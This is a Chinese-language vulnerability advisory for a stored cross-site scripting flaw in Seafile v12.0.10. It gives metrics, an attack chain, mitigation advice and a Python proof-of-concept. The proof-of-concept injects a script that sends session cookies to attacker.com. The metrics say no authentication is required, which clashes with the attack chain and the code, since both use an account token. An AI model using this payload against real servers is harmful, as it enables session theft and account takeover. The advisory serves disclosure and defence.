CVE-2025-41080 Seafile 存储型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-41080

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Seafile

漏洞概述

CVE-2025-41080是Seafile云存储软件中发现的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Seafile v12.0.10版本中，攻击者可以通过在文件上传接口中注入恶意JavaScript代码，当其他用户访问或查看被污染的文件时，恶意脚本将在受害者浏览器中执行。攻击者利用此漏洞可以窃取用户会话cookie、劫持用户账户、执行任意客户端操作或进行钓鱼攻击。由于该漏洞为存储型XSS，恶意payload会被永久保存在服务器端，影响范围更广，危害更为严重。此漏洞无需高权限即可实施攻击，但需要诱导受害者进行某些交互操作，如访问特定页面或查看文件内容。

技术细节

该漏洞的根本原因在于Seafile的API端点'/api/v2.1/repos/{repo_id}/file/'在处理POST参数'p'时未对用户输入进行充分的HTML转义或内容安全策略（CSP）验证。攻击者可以构造包含恶意JavaScript代码的文件名或内容，通过API接口上传到服务器。由于后端未对特殊字符进行过滤或编码，这些恶意payload会被直接存储在数据库中。当其他用户通过Web界面浏览该文件时，服务器将未经过滤的内容返回给客户端浏览器，浏览器将其解析为可执行脚本。攻击者利用此漏洞可以获取受害者的认证令牌、读取敏感数据或冒充用户执行操作。攻击者通常会结合社会工程学技巧，诱导用户访问特定链接或文件，从而触发XSS执行。

攻击链分析

STEP 1

步骤1

攻击者获取Seafile服务器访问权限或注册合法账户

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload

STEP 3

步骤3

攻击者通过POST请求向/api/v2.1/repos/{repo_id}/file/端点发送恶意payload，使用参数'p'注入代码

STEP 4

步骤4

服务器端未对输入进行过滤或转义，将恶意payload存储在数据库中

STEP 5

步骤5

受害者访问被污染的文件或页面，服务器返回包含恶意代码的响应

STEP 6

步骤6

受害者浏览器解析并执行恶意JavaScript代码，导致会话劫持或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-41080 Stored XSS PoC for Seafile v12.0.10
# Target: Seafile API endpoint /api/v2.1/repos/{repo_id}/file/
# Attack Vector: POST parameter 'p' contains malicious JavaScript payload

import requests
import json

TARGET_URL = "https://target-seafile-server.com"
REPO_ID = "your-repo-id-here"
API_ENDPOINT = f"{TARGET_URL}/api/v2.1/repos/{REPO_ID}/file/"

# Malicious XSS payload - steals session cookies
XSS_PAYLOAD = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"

def exploit_stored_xss():
    """
    Exploit the stored XSS vulnerability by uploading a file with malicious content
    via the POST parameter 'p' in the Seafile API endpoint.
    """
    headers = {
        "Authorization": "Token your-auth-token",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # Payload injection through POST parameter 'p'
    data = {
        "p": f"/path/to/file.txt{XSS_PAYLOAD}",
        "filename": f"malicious_file.txt{XSS_PAYLOAD}"
    }
    
    try:
        response = requests.post(API_ENDPOINT, headers=headers, data=data, verify=False)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        if response.status_code == 200:
            print("[+] XSS payload successfully stored on the server!")
            print("[+] Any user viewing this file will trigger the malicious script.")
        else:
            print("[-] Exploitation failed. Check credentials and target.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("[*] CVE-2025-41080 - Seafile Stored XSS Exploit")
    print("[*] Target: Seafile v12.0.10")
    exploit_stored_xss()

影响范围

Seafile v12.0.10

防御指南

临时缓解措施

在官方补丁发布前，可通过在Web服务器层面配置严格的Content-Security-Policy头部限制脚本执行，并对/api/v2.1/repos/{repo_id}/file/等敏感API端点实施输入过滤和参数验证，暂时禁用文件预览功能以减少攻击面。建议监控日志中的异常请求模式，及时发现和阻断XSS攻击尝试。